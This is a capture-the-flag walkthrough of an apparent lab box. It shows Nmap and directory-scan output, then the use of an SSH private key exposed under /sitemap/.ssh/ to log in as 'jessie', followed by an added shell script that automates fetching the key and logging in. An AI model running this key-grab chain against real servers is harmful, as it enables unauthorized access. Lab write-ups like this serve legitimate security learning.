Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 08:39 EDT
Nmap scan report for 10.10.164.53
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/16%OT=22%CT=1%CU=36653%PV=Y%DS=2%DC=T%G=Y%TM=5EBFDF2
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)OPS(
OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11
OS:NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
The full TCP port scan shows only two open ports: SSH (OpenSSH 7.2p2) and HTTP (Apache 2.4.18 serving the default Ubuntu page). Brute-forcing directories on the web server turns up /sitemap/, which leads to a different page than the Apache default.
Dirs found with a 200 response:
/
/sitemap/
/sitemap/.ssh/
/sitemap/images/
/sitemap/js/
/sitemap/css/
/sitemap/fonts/
/sitemap/fonts/bootstrap/
/sitemap/fonts/icomoon/

Dirs found with a 403 response:
/.hta/
/.htaccess/
/.htpasswd/
/icons/
/icons/.htaccess/
/icons/.htpasswd/
/icons/.hta/
/server-status/
/sitemap/.hta/
/sitemap/.htaccess/
/sitemap/.htpasswd/
/sitemap/.ssh/.hta/
/sitemap/.ssh/.htaccess/
/sitemap/.ssh/.htpasswd/
/sitemap/images/.hta/
/sitemap/images/.htpasswd/
/sitemap/images/.htaccess/
/sitemap/js/.hta/
/sitemap/js/.htaccess/
/sitemap/js/.htpasswd/
/icons/small/
/icons/small/.htpasswd/
/icons/small/.hta/
The page source contains a comment addressed to someone named Jessie, asking that person to do something. That gives us a likely username on the box: jessie.
Among the directories that returned 200, /sitemap/.ssh/ stands out: directory listing is enabled on it and it exposes an id_rsa file, i.e. someone's SSH private key. We can try that key against the jessie account. Open /sitemap/.ssh/id_rsa in the browser (or fetch it with curl), save the contents to a local file named id_rsa, and restrict its permissions, because ssh refuses to use a private key that is readable by other users:
chmod 600 id_rsa
Then log in with the key:
ssh -i id_rsa jessie@$IP
The key is accepted without a passphrase, we get a shell as jessie, and from there we can read the user flag.
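The whole key-grab procedure above, scripted, as an added example that is not part of the original writeup. It assumes the target IP, the /sitemap/.ssh/id_rsa path and the jessie username from the page; the helper names and the RUN_EXPLOIT switch are our own. Unlike copying the key by hand, it fails early when the "key" is really an HTML error page, fixes the file mode that ssh insists on, and checks for a passphrase before attempting the login:

```shell
#!/bin/sh
# Added example (not from the original writeup): fetch a private key that an
# Apache directory listing exposes, sanity-check it, fix its mode, and log in.
# Assumptions: target IP, key path and username come from the writeup above;
# helper names and RUN_EXPLOIT are ours.
set -eu

TARGET="${TARGET:-10.10.164.53}"
KEY_URL="http://$TARGET/sitemap/.ssh/id_rsa"
KEY_FILE="${KEY_FILE:-./id_rsa}"
USER_NAME="${USER_NAME:-jessie}"

# fetch_key URL DEST: download with curl; -f makes a 403/404 a hard failure so
# an error page body is never saved as "key material".
fetch_key() {
    curl -fsS -o "$2" "$1"
}

# is_private_key FILE: returns 0 when the first line is a PEM/OpenSSH
# private-key header. Directory listings often hand you HTML instead.
is_private_key() {
    head -n 1 "$1" | grep -q -- '-----BEGIN .*PRIVATE KEY-----'
}

# secure_key FILE: ssh rejects keys readable by group/others
# ("UNPROTECTED PRIVATE KEY FILE!"), so force mode 0600 and verify it stuck.
secure_key() {
    chmod 600 "$1" && [ -z "$(find "$1" -prune ! -perm 600)" ]
}

# prepare_key FILE: both checks together; returns 1 if FILE is not usable.
prepare_key() {
    is_private_key "$1" || { echo "$1: not a private key" >&2; return 1; }
    secure_key "$1"
}

main() {
    fetch_key "$KEY_URL" "$KEY_FILE"
    prepare_key "$KEY_FILE"
    # -y with an empty passphrase fails if the key is encrypted; in that case
    # the key would need cracking before it is any use, so stop here.
    ssh-keygen -y -P "" -f "$KEY_FILE" >/dev/null
    ssh -o StrictHostKeyChecking=no -i "$KEY_FILE" "$USER_NAME@$TARGET" 'id; ls -la ~'
}

# Run the full chain only when explicitly asked, so the helpers can be sourced
# and tested offline:  RUN_EXPLOIT=1 sh grab_key.sh
case "${RUN_EXPLOIT:-0}" in
    1) main ;;
esac
```

The two checks are the parts worth keeping for real engagements: an exposed .ssh/ listing is a strong finding even when the key turns out to be passphrase-protected or the guessed username is wrong, and the script leaves you with a clean key file either way.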